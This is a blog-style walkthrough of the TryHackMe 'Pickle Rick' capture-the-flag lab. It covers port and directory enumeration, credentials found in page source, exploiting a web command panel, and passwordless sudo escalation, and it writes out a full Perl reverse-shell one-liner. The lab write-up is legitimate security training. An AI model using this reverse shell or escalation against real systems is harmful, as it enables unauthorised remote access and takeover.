Pickle Rick CTF Walkthrough -TryHackMe

A Rick and Morty CTF. Help turn Rick back into a human!

Rick turned into a pickle

What happened Rick?

We need to save Rick

This is Rick and Morty themed challenge,we are Morty in this challenge. We have to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.Let’s use our hacking super power and hack the web server and save Rick.

Room link:https://tryhackme.com/room/picklerick

Launch the box and let’s enumerate the IP given.

Use: nmap -sC -sV -A machine IP

  • nmap is network mapper tool
  • -sC -> default script scanning
  • -sV -> version detection
fig 1. nmap result

We can see that the ports 22 and 80 are open.Port 22 is for SSH(secure shell ) and port 80 for HTTP. Lets go to the the browser and paste the IP there and check what is waiting for us.

fig 2. The website

Let’s spend some time to enumerate this website.Let’s view the source code.

fig 3.a user name found

A user name is found here. let’s do directory enumeration and check other directories also.

Use: gobuster dir -u machine_ip -w wordlist_path

  • gobuster -> tool
  • dir-> directory enumeration mode
  • -w ->specify wordlist path
fig 4. Gobuster

The results says there are many directories.Let’s open one by one.

fig 5./assets
fig 6. /robots.txt

Here we got a password.

fig 7. /login.php

Let’s try the password and user name that we have in our hand now.

fig 8. login.php

I simply viewed the source code of this logged in page and found something interesting.

fig 9. source code of login.php

I guess we have a base64 encrypted password. Let’s go to CyberChef to crack it.

fig 10. A rabbit hole

I had to do the decryption almost 9 times to understand it was a rabbit hole,But that’s Ok. Keep moving forward we need to save Rick.

don’t worry rick,morty to the rescue

Let’s check the logged in page.

Wait that’s strange! why is it showing a command panel here? Let’s execute some basic commands ans see.

fig 11. logged in page

This page has command execution vulnerability, Let’s try some more commands.

fig 12. executing commands
fig 13. attempt failed

Seems like our commands are sanitized.Which means our code will not be executed it will be just evaporate before it reaches the server.

Got another idea. We shall take a reverse shell from here.I used a Perl reverse shell code.

use:perl -e ‘use Socket;$i=”IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

Listen to the port set.

fig 14. listening to port 1234

Execute the command in the website and get the shell as shown below (fig 15).

fig 15. shell created successfully

Now let’s execute some codes in the /var/www/html directory

fig 16. First secret ingredient found

Now let’s move around through the server and find other two more secret ingredients.

Let’s go to the /home directory and search.

fig 17. second secret ingredient found

We are one step away from saving Rick.

Use: sudo -l

fig 18. something fishy

We found something very interesting that we can run everything in sudo without a password.

Time for privilege escalation.

use: sudo su

fig 19. Third secret ingredient found

We finally saved Rick.

Summary

  1. Basic enumeration done- port 22,port 80 open.
  2. We did directory enumeration on website.
  3. Website had command execution vulnerability.
  4. We took a reverse shell using perl code.
  5. We could switch user without password.
  6. We did sudo su to switch user and captured flags.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store